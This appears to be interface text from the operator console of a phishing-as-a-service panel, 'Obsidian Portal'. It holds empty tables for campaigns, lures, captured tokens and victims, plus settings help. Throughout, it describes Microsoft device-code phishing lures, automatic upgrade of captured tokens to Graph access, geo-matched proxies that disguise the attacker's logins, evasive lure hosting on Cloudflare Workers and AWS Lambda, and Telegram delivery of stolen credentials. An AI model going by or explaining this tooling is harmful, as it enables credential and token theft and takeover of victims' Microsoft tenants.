| ID | Status | Bot | Code | Source |
|---|
| Account |
|---|
| ID | Status | Bot | User Code | Client | Source | Visitor → Proxy | Created |
|---|
| # | Campaign | Template | Landing URL | Document | Source tag | Routing |
|---|
| # | Campaign | Theme | Status | Gate URL | Routing | Analytics |
|---|
| # | Campaign | Filters | Status | Routing | Analytics |
|---|
| IP | Location | ISP / ASN | OS | Outcome | Reason | Time |
|---|
Analytics require the PHP gate to report back to Obsidian. Re-download and re-upload PHP after creating or updating a gate.
| Name | Sender | Status | Progress | Sent | Failed | Remaining | Created | |
|---|---|---|---|---|---|---|---|---|
| No campaigns yet — create one to begin. | ||||||||
| Email / Name | Subject | Egress IP | Proxy | Time | ||
|---|---|---|---|---|---|---|
| No sends yet — start a campaign | ||||||
Console access uses username and password. Enable an authenticator app for two-factor login.
Use Google Authenticator, Authy, 1Password, or any TOTP app. Works for admin and tenant accounts.
Checking…
Scan this QR code or enter the secret manually in your authenticator app.
Lures use the built-in Microsoft Office client ID (d3590ed6…). Captured tokens are upgraded to Graph automatically. Global Admin accounts unlock tenant management from the token Manage panel.
Used when a lure has no saved proxy selected. Supports http://, https://, socks5://, or host:port:user:pass.
HydraProxy, WhiteProxies, manual HTTP/HTTPS/SOCKS5, or paste a full URL.
When enabled, each victim gets a proxy in their country (via Cloudflare geo header or IP lookup). Device-code auth egress matches their location.
HydraProxy appends _country-CountryName to the password. Fallback country is used when visitor geo cannot be detected.
WhiteProxies uses username/password as-is.
Deploy lures to *.workers.dev using your Cloudflare account email and Global API Key.
Deploy lures to AWS Lambda — avoid *.workers.dev reputation issues. Creates a Python Lambda function + HTTP API Gateway per lure. Each lure gets a unique https://{'{api-id}'}.execute-api.{'{region}'}.amazonaws.com URL.
Required IAM permissions: lambda:*, apigateway:*, iam:GetRole, iam:CreateRole, iam:AttachRolePolicy, sts:GetCallerIdentity
Rich capture alerts from Obsidian Portal — emoji summary message plus a credentials .txt attachment. Set your bot display name to Obsidian Portal in @BotFather for on-brand sender identity.
| User | ID | Status | Bot | Code |
|---|
| User | Status | Active Tokens | Sessions | Lures |
|---|
Each user gets an isolated SQLite database for tokens, sessions, lures, and settings.
| # | ID | Email / Name | Owner | Tenant | Captured | Status |
|---|
| # | ID | Email / Code | Owner | Status | Bot | Source | Created |
|---|